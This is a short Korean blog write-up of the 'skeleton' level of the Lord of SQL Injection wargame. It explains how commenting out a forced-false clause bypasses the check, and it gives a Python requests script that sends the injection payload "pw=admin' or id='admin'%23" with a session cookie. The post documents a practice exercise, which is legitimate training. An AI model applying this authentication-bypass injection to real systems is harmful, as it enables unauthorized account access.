WarGame/LOS

10. LOS - skeleton

m0nd2y 2018. 8. 7. 07:17

LOS 10번째 문제 skeleton입니다!


먼저 코드를 보면



pw뒤에 and 1 = 0으로 만들어줘서 고의적으로 거짓으로 만들어 줬습니다.

그럼 저 부분을 참으로 만들어줘야하는데

저는 id에 'admin'을 넣고 뒷부분을 모두 주석으로 처리해주어서 풀었습니다 :)

페이로드는 다음과 같습니다.



1
2
3
4
5
6
7
8
9
10
11
import requests
import string
 
URL = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"
payload = "?pw=admin' or id='admin'%23"
URL += payload
 
cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
response = requests.get(URL, cookies = cookies)
print(response.text)
 
cs